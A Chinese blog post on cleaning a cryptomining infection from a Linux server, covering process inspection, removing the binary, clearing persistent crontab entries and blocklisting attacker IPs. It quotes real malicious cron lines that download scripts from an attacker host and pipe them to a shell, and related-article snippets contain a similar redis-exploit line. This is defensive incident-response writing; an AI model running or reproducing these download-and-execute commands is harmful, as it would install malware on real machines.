清除 挖矿脚本 攻击

最新推荐文章于 2024-05-31 12:43:11 发布
最新推荐文章于 2024-05-31 12:43:11 发布
阅读量3.5k 收藏 6
点赞数 1
分类专栏: # Linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xzlAwin/article/details/89488439
版权

清除 挖矿脚本 攻击

1.查看系统进程,是否有异常: top

发现CPU占用率200%,判定服务器已经被植入木马

2.查看异常进程是哪一个程序造成的 ls -al /proc/14618

发现恶意程序(绿色的是可执行文件)/etc/lafy

3.删除恶意程序

cd  /etc

rm -rf lzfy

4.发现过了一会,lzfy恶意程序再次出现,怀疑是个定时任务

查看定时任务 crontab -l

发现有3个下载的可疑行为,下载木马脚本

一共发现3个可疑的攻击脚本的网络地址

*/13 * * * * url -fsSL http://w.3ei.xyz:43768/lll.sh | sh

*/2 * * * * wget -O .cmd http://w.3ei.xyz:43768/lll.sh && bash .cmd

*/12 * * * * curl -fsSL http://w.3ei.xyz:43768/crontab.sh | sh

先杀死程序 kill -9 14618

清除定时任务 crontab -e

如果定时任务不能删除可能是文件属性+i操作

cd var/spool/cron

chattr -ia cron

删除root用户的定时任务

rm -rf root

再次删除恶意程序

cd  /etc

rm -rf lzfy

 

5.清除临时目录其他可疑文件

cd tmp

ll

 

6.查看可疑的网络连接

lsof -i

lsof -c lzfy

7.追踪攻击者IP

ping 域名获取攻击者IP地址

打开cmd

ping w.3ei.xyz

获得IP地址为220.194.237.43

8.最后拿到的可疑IP地址列表

47.101.30.124

218.28.144.38

140.143.35.89

将上述IP列表加入黑名单即可。

9.附件:从服务器上查看近期上传的可疑文件

  

10.最终获得所有黑客攻击的文件,

3个shell脚本

crontab.sh,lll.sh,update.sh

3个exe攻击程序副本

bajx,lzfy,pvds

1个js挖矿脚本

3个试探攻击文件

rzx,systemctI,yums

 

(撒花)晒尸体

黑客hello网站地址:

http://w.3ei.xyz:43768/

 

 

 

 

作者:xzlAwin

日期:2019.04.24

xzlAwin
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
libgcc-a挖矿木马清除脚本
05-19
用于清楚Xmrig木马变种libgcc_a
XSS跨站脚本攻击
01-27
跨站脚本攻击(XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
清除挖矿脚本 minerd
鸿仔的博客
04-14 1153
症状:cup占用率飙高 原因:这次入侵是由于redis没有设置用户名密码,没有限制访问ip导致  解决方法: ps -eopcpu,args --sort=%cpu|head    找到飙高的程序是minerd TOP查看minerd的pid kill -s 9 pid(pid的值每个服务器不同) rm -rf  /var/spool/cron/cronta
清除挖矿木马脚本
onlyellow的博客
07-01 525
朋友的云主机被入侵挖矿了,说是杀不掉。 登录检查了下,发现是因为crontab和守护进程双重保险。 写脚本批量删除即可 脚本内容如下 #!/bin/bash guard_name=ps -ef|awk '{print $8}' |grep -E ^[[:alnum:]]{12}$ guard_pid=ps -ef|grep $guard_name|awk '{print $2}' miner_pid=ps -ef|grep kthreaddi |awk '{print $2}' virus_name=cro
阿里云服务器被挖矿
最新发布
weixin_44034675的博客
05-31 1020
新增SSH端口——>重启sshd服务——>添加防火墙规则——>尝试新端口登陆——>关闭原先的22端口——>增加ip白名单。dr-xr-x---. 8 root root 4096 3月 19 15:57 ..drwx------ 2 root root 4096 3月 18 14:47 .drwx------. 2 root root 4096 8月 9 2019 .- 删除i属性使文件 /etc/passwd和 /etc/shadow具有相同的属性。控制台会自动断开之前使用端口22产生的连接。
删除挖矿程序
小渣渣
12-19 2660
服务器的cpu突然出现了一个陌生的进程,占用很高,简单的kill将其杀不掉,可能是挖矿程序 (1)top 查看进程号 ls -l /proc/进程号/exe 找到进程所在目录,此例子文件在/var/tmp路径下 (2)cd /var/tmp && ls -a 找到隐藏的进程文件 rm -rf .systemd-private-c15c0d5284bd...
记一次简单的清理挖矿程序过程-kdevtmpfsi
不吃_花椒的博客
12-24 1万+
服务器CPU被跑满了,是一个名为‘kdevtmpfsi’的程序 1:第一步要先找到这个kdevtmpfsi文件实体,对了还有一个叫ddg.2020的进程。 find / -name kdevtmpfsi#查找后全部删除 #切换到对应目录后删除 rm -f kdevtmpfsi 2:kill 掉对应的程序 kill -9 PID 3: 查看定时任务程序 crontab -l #查找可疑的定...
凶残的挖矿脚本,奴役我数千机器!
weixin_39787242的博客
08-09 1万+
本文转载自不正经程序员 温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。 挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。 有钱的地方,就有技术。但反过来并不一定成立。 牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。 1. 脚本从哪来? 下面是一个http的报文。 GET /console/images/%2E%2E%2F
关于跨站脚本攻击问题
09-05
个问题我的理解是只要让其他网站能执行我的脚本我就有可能危害到,这个网站的用户安全
也谈跨站脚本攻击与防御
01-02
网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括...
【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
今天是几号的博客
04-25 2294
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。
python 从扩展模块中定义和导出C的API
xzlAwin的博客
01-01 567
扩展模块头源代码,pysample.h/*** Created on: 2022年12月30日*/#endif= NULL)?1 : 0;}#endif}#endif扩展模块源代码,ptexample.c/*** Created on: 2022年12月30日*/Point *p;if (!}if (!p) {}}};-1,};if (!}return m;}python编译配置,ptsetup.py)])
测试
weixin_43882201的博客
12-28 210
测试欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑...
Ant 工具安装
xzlAwin的博客
05-25 440
Ant 工具安装下载地址:http://ant.apache.org/bindownload.cgi环境变量的配置变量名:ANT_HOME变量值:D:\Program Files\apache-ant-1.8.3在系统变量名PATH加入变量值:%ANT_HOME%\bin错误:ANT_HOME is set incorrectly or ant could not be located. Plea
PT站的分享精神,我所向往的PT分享模式(原创)
xzlAwin的博客
05-25 2771
PT和BT是网络下载用的比较多的方式,BT大家都知道,我就不过多介绍了。PT就好像是优化的BT,PT 英文 Private Tracker 私用种子服务器。BT是公共传输的,因为很多人下载后并没有继续做种,这样大家下载完成之后一段时间,种子就会因为没有人做种而失效。PT的出现解决了,种子下载后因为每人做种而失效。通过PT论坛准确的记录了,种子的活动情况和会员的下载情况,方便PT论坛管理者通过积分手
阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本
热门推荐
zzf1510711060的博客
10-11 1万+
一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 ...
挖矿病毒清除记录
weixin_34174422的博客
04-10 6186
转载地址:https://www.52pojie.cn/thread-864849-1-1.html?tdsourcetag=s_pctim_aiomsg起因是同学过年期间因阿里云的服务器Redis弱口令(好像是没设密码)被提权植入了挖矿病毒,CPU长期占用100%。登录服务器后,首先使用Top命令,查看CPU占用。发现CPU占用率达到100%,可是却没有相关占用高的进程。想...
[日常] 研究redis未授权访问漏洞利用过程
程序员老狼专注开发aigc或客服系统应用
03-27 94
前提:redis允许远程连接,不需要密码 1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "\n\n*/2...
在针对服务器的挖矿脚本攻击中可能涉及到哪些漏洞,具体的漏洞利用和攻击流程是什么,有哪些可行的防御措施
04-04
可能涉及到以下漏洞: 1. 未经授权的远程访问漏洞:攻击者可能会利用未经授权的远程访问漏洞来入侵服务器,并在其中安装挖矿脚本。 2. 未修补的软件漏洞:攻击者可能会利用未修补的软件漏洞,例如操作系统或数据库软件中的漏洞,来入侵服务器并安装挖矿脚本。 3. 弱密码或默认凭证:攻击者可能会尝试使用弱密码或默认凭证来入侵服务器,并在其中安装挖矿脚本攻击流程: 1. 搜索目标服务器:攻击者可能会使用扫描工具来搜索网络上的目标服务器,并尝试发现未经授权的远程访问漏洞或未修补的软件漏洞。 2. 入侵服务器:攻击者可能会使用漏洞利用工具来入侵目标服务器,并在其中安装挖矿脚本。 3. 启动挖矿脚本攻击者可能会使用已安装的挖矿脚本来开始在服务器上挖矿。 防御措施: 1. 及时修补漏洞:及时修补操作系统、数据库和其他软件中的漏洞,以减少攻击者入侵服务器的机会。 2. 加强访问控制:使用强密码和多因素身份验证等措施来加强对服务器的访问控制,以减少未经授权的访问。 3. 安装防病毒软件:安装并定期更新防病毒软件,以检测和阻止挖矿脚本的入侵。 4. 监控网络流量:使用网络流量监控和入侵检测系统来监视网络流量和服务器活动,以及及时发现并应对入侵行为。 5. 限制应用程序权限:限制应用程序的权限,例如使用沙箱技术或操作系统级别的容器,以减少挖矿脚本的影响范围。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值